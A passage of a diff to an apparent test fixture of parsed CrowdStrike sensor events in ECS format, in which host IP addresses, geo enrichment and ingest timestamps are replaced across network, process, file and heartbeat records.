"{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677523.901\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP4\":\"127.0.0.1\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364783686797112486\",\"RemotePort\":\"50626\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6MacV10\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677524048\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.048Z", "kind": "event", "action": "NetworkConnectIP6", @@ -890,21 +794,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.194.125.248", - "vendor": "crowdstrike", - "ip": "208.194.125.248", "serial_number": "ffffffffcf45409f87ed463b40c368ec", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0010912.1" + "version": "1007.8.0010912.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:35.482Z", "ecs": { @@ -912,7 +807,7 @@ }, "related": { "hosts": [ - "208.194.125.248" + "67.43.156.14" ], "hash": [ "29037cef466fa57f03bd1b2a092c47a4", @@ -920,12 +815,12 @@ "1284133626" ], "ip": [ - "208.194.125.248" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465491900Z", - "original": "{\"ParentProcessId\":\"38911774195823\",\"SourceProcessId\":\"38911774195823\",\"aip\":\"208.194.125.248\",\"SessionProcessId\":\"38911772846634\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Lin\",\"ProcessEndTime\":\"1625677535.102\",\"SVUID\":\"114\",\"ParentBaseFileName\":\"bash\",\"id\":\"ffffffff-1111-11eb-bad4-02690d039c6b\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677535482\",\"ProcessGroupId\":\"9277112078\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"73249\",\"GID\":\"119\",\"ConfigStateHash\":\"1284133626\",\"SVGID\":\"119\",\"MD5HashData\":\"29037cef466fa57f03bd1b2a092c47a4\",\"SHA256HashData\":\"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112\",\"ConfigBuild\":\"1007.8.0010912.1\",\"UID\":\"114\",\"CommandLine\":\"pgbackrest --stanza\\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG\",\"TargetProcessId\":\"38911778380590\",\"ImageFileName\":\"/usr/bin/pgbackrest\",\"RGID\":\"119\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2LinV6\",\"RUID\":\"114\",\"ProcessStartTime\":\"1625677535.068\",\"aid\":\"ffffffffcf45409f87ed463b40c368ec\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150633400Z", + "original": "{\"ParentProcessId\":\"38911774195823\",\"SourceProcessId\":\"38911774195823\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"38911772846634\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Lin\",\"ProcessEndTime\":\"1625677535.102\",\"SVUID\":\"114\",\"ParentBaseFileName\":\"bash\",\"id\":\"ffffffff-1111-11eb-bad4-02690d039c6b\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677535482\",\"ProcessGroupId\":\"9277112078\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"73249\",\"GID\":\"119\",\"ConfigStateHash\":\"1284133626\",\"SVGID\":\"119\",\"MD5HashData\":\"29037cef466fa57f03bd1b2a092c47a4\",\"SHA256HashData\":\"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112\",\"ConfigBuild\":\"1007.8.0010912.1\",\"UID\":\"114\",\"CommandLine\":\"pgbackrest --stanza\\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG\",\"TargetProcessId\":\"38911778380590\",\"ImageFileName\":\"/usr/bin/pgbackrest\",\"RGID\":\"119\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2LinV6\",\"RUID\":\"114\",\"ProcessStartTime\":\"1625677535.068\",\"aid\":\"ffffffffcf45409f87ed463b40c368ec\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:35.482Z", "kind": "event", "action": "ProcessRollup2", @@ -988,21 +883,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.238.3.157", - "vendor": "crowdstrike", - "ip": "208.238.3.157", "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:03.713Z", "ecs": { @@ -1010,20 +896,20 @@ }, "related": { "hosts": [ - "208.238.3.157", + "67.43.156.14", "0:0:0:0:0:0:0:1" ], "hash": [ "1701000200" ], "ip": [ - "208.238.3.157", + "67.43.156.14", "0:0:0:0:0:0:0:1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465498600Z", - "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677503.713\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307455014463\",\"RemotePort\":\"0\",\"aip\":\"208.238.3.157\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"41952\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677503947\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150639700Z", + "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677503.713\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307455014463\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"41952\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677503947\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:03.947Z", "kind": "event", "action": "NetworkConnectIP6", @@ -1064,21 +950,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.230.3", - "vendor": "crowdstrike", - "ip": "208.24.230.3", "serial_number": "ffffffff20bd481a98a3d1f6191047ff", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:20.973Z", "file": { @@ -1093,18 +970,18 @@ }, "related": { "hosts": [ - "208.24.230.3" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.24.230.3" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465505600Z", - "original": "{\"event_simpleName\":\"OoxmlFileWritten\",\"ContextTimeStamp\":\"1625677520.973\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365044948432500700\",\"ContextThreadId\":\"0\",\"aip\":\"208.24.230.3\",\"FileIdentifier\":\"0500000100000000000000000000000021b0260000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OoxmlFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8ad1-02cfdadef55f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff20bd481a98a3d1f6191047ff\",\"timestamp\":\"1625677521081\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508\"}", + "ingested": "2021-12-09T13:36:11.150646300Z", + "original": "{\"event_simpleName\":\"OoxmlFileWritten\",\"ContextTimeStamp\":\"1625677520.973\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365044948432500700\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"0500000100000000000000000000000021b0260000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OoxmlFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8ad1-02cfdadef55f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff20bd481a98a3d1f6191047ff\",\"timestamp\":\"1625677521081\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508\"}", "created": "2021-07-07T17:05:21.081Z", "kind": "event", "action": "OoxmlFileWritten", @@ -1133,44 +1010,14 @@ "type": "linux" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.254.169.254", "port": 80, - "ip": "208.254.169.254" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.230.137.65", "port": 59926, - "ip": "208.230.137.65" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -1179,27 +1026,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:YcpozwAVBz67M5acsICvqFK2JB0=", + "community_id": "1:XUmTKB40anItSVy47MPGAZ+mJWM=", "transport": "tcp", "iana_number": "6", "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.144.51.215", - "vendor": "crowdstrike", - "ip": "208.144.51.215", "serial_number": "ffffffffbd064538b214ab0dce8e82c3", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:05:30.308Z", "ecs": { @@ -1207,22 +1045,20 @@ }, "related": { "hosts": [ - "208.144.51.215", - "208.230.137.65", - "208.254.169.254" + "67.43.156.13", + "67.43.156.14" ], "hash": [ "3469235958" ], "ip": [ - "208.144.51.215", - "208.230.137.65", - "208.254.169.254" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465512400Z", - "original": "{\"LocalAddressIP4\":\"208.230.137.65\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677530.308\",\"ConfigStateHash\":\"3469235958\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12227094573885\",\"RemotePort\":\"80\",\"aip\":\"208.144.51.215\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59926\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4LinV5\",\"id\":\"ffffffff-1111-11eb-b727-028bbe41f38d\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffbd064538b214ab0dce8e82c3\",\"RemoteAddressIP4\":\"208.254.169.254\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677530841\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150652600Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677530.308\",\"ConfigStateHash\":\"3469235958\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12227094573885\",\"RemotePort\":\"80\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59926\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4LinV5\",\"id\":\"ffffffff-1111-11eb-b727-028bbe41f38d\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffbd064538b214ab0dce8e82c3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677530841\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.841Z", "kind": "event", "action": "NetworkConnectIP4", @@ -1248,21 +1084,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.231.69.37", - "vendor": "crowdstrike", - "ip": "208.231.69.37", "serial_number": "ffffffff25b14d4aa96de99e24bad2fa", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:53.974Z", "os": { @@ -1273,19 +1100,19 @@ }, "related": { "hosts": [ - "208.231.69.37" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.231.69.37" + "67.43.156.14" ] }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-11-22T09:23:55.465519Z", - "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1156120155\",\"ChannelDiffStatus\":\"1\",\"aip\":\"208.231.69.37\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"12\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV2\",\"id\":\"ffffffff-1111-11eb-b7e0-02332cdcc16d\",\"ErrorCode\":\"0\",\"aid\":\"ffffffff25b14d4aa96de99e24bad2fa\",\"timestamp\":\"1625677493974\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150658800Z", + "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1156120155\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"12\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV2\",\"id\":\"ffffffff-1111-11eb-b7e0-02332cdcc16d\",\"ErrorCode\":\"0\",\"aid\":\"ffffffff25b14d4aa96de99e24bad2fa\",\"timestamp\":\"1625677493974\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b7e0-02332cdcc16d", "created": "2021-07-07T17:04:53.974Z" }, @@ -1311,9 +1138,24 @@ "type": "linux" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "mac": "6e-9e-e0-1f-6d-7d", - "address": "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d", - "ip": "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -1322,21 +1164,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffc9114c1898e79604708955a6", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:21.218Z", "ecs": { @@ -1344,20 +1177,20 @@ }, "related": { "hosts": [ - "208.203.151.21", - "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1156120155" ], "ip": [ - "208.203.151.21", - "ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465525700Z", - "original": "{\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677520.686\",\"aip\":\"208.203.151.21\",\"PhysicalAddress\":\"6e-9e-e0-1f-6d-7d\",\"InterfaceAlias\":\"vethdeb0243\",\"InterfaceIndex\":\"3736\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP6LinV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffffc9114c1898e79604708955a6\",\"timestamp\":\"1625677521218\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150665100Z", + "original": "{\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677520.686\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"6e-9e-e0-1f-6d-7d\",\"InterfaceAlias\":\"vethdeb0243\",\"InterfaceIndex\":\"3736\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP6LinV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffffc9114c1898e79604708955a6\",\"timestamp\":\"1625677521218\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.218Z", "kind": "state", "action": "LocalIpAddressIP6", @@ -1383,21 +1216,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.169.10.84", - "vendor": "crowdstrike", - "ip": "208.169.10.84", "serial_number": "ffffffff2d7b4778a73b2cf58d327e42", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:40.455Z", "os": { @@ -1408,19 +1232,19 @@ }, "related": { "hosts": [ - "208.169.10.84" + "67.43.156.13" ], "hash": [ "1620585913" ], "ip": [ - "208.169.10.84" + "67.43.156.13" ] }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-11-22T09:23:55.465532600Z", - "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1620585913\",\"ChannelDiffStatus\":\"1\",\"aip\":\"208.169.10.84\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"210\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ChannelVersionRequiredMacV2\",\"id\":\"ffffffff-1111-11eb-8cc5-02c6fb049dd3\",\"ErrorCode\":\"0\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff2d7b4778a73b2cf58d327e42\",\"timestamp\":\"1625677480455\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150671500Z", + "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1620585913\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.13\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"210\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ChannelVersionRequiredMacV2\",\"id\":\"ffffffff-1111-11eb-8cc5-02c6fb049dd3\",\"ErrorCode\":\"0\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff2d7b4778a73b2cf58d327e42\",\"timestamp\":\"1625677480455\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-8cc5-02c6fb049dd3", "created": "2021-07-07T17:04:40.455Z" }, @@ -1445,21 +1269,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.231.69.37", - "vendor": "crowdstrike", - "ip": "208.231.69.37", "serial_number": "fffffffff6e146908cbf31d72b94b626", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:40.292Z", "os": { @@ -1470,18 +1285,18 @@ }, "related": { "hosts": [ - "208.231.69.37" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.231.69.37" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465539500Z", - "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"1156120155\",\"NetworkContainmentState\":\"0\",\"aip\":\"208.231.69.37\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ConfigurationVersion\":\"10\",\"name\":\"SensorHeartbeatLinV4\",\"ConfigIDPlatform\":\"8\",\"id\":\"ffffffff-1111-11eb-993f-02b8dc387eb5\",\"ConfigIDBuild\":\"11611\",\"aid\":\"fffffffff6e146908cbf31d72b94b626\",\"timestamp\":\"1625677540292\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150677900Z", + "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"1156120155\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ConfigurationVersion\":\"10\",\"name\":\"SensorHeartbeatLinV4\",\"ConfigIDPlatform\":\"8\",\"id\":\"ffffffff-1111-11eb-993f-02b8dc387eb5\",\"ConfigIDBuild\":\"11611\",\"aid\":\"fffffffff6e146908cbf31d72b94b626\",\"timestamp\":\"1625677540292\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:40.292Z", "kind": "event", "action": "SensorHeartbeat", @@ -1529,24 +1344,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Gresham", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", - "location": { - "lon": -122.4167, - "lat": 45.5152 - } - }, - "address": "208.187.110.246", - "vendor": "crowdstrike", - "ip": "208.187.110.246", "serial_number": "ffffffff083845f68a7de3d95cb34361", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:28.570Z", "file": { @@ -1562,18 +1365,18 @@ }, "related": { "hosts": [ - "208.187.110.246" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.187.110.246" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465546300Z", - "original": "{\"event_simpleName\":\"JavaClassFileWritten\",\"ContextTimeStamp\":\"1625677528.570\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364783686797112486\",\"ContextThreadId\":\"0\",\"aip\":\"208.187.110.246\",\"FileIdentifier\":\"04000001000000000000000000000000986b480e00000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"JavaClassFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"timestamp\":\"1625677528717\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class\"}", + "ingested": "2021-12-09T13:36:11.150684100Z", + "original": "{\"event_simpleName\":\"JavaClassFileWritten\",\"ContextTimeStamp\":\"1625677528.570\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364783686797112486\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000986b480e00000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"JavaClassFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"timestamp\":\"1625677528717\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class\"}", "created": "2021-07-07T17:05:28.717Z", "kind": "event", "action": "JavaClassFileWritten", @@ -1602,24 +1405,9 @@ "type": "macos" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.208.21.205", "port": 443, - "ip": "208.208.21.205" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { "port": 0, @@ -1638,21 +1426,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.223.60.11", - "vendor": "crowdstrike", - "ip": "208.223.60.11", "serial_number": "ffffffff96f142f6b2475f3c584ddd80", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:12.700Z", "ecs": { @@ -1660,22 +1439,20 @@ }, "related": { "hosts": [ - "208.223.60.11", - "0.0.0.0", - "208.208.21.205" + "67.43.156.14", + "0.0.0.0" ], "hash": [ "1620585913" ], "ip": [ - "208.223.60.11", - "0.0.0.0", - "208.208.21.205" + "67.43.156.14", + "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465553100Z", - "original": 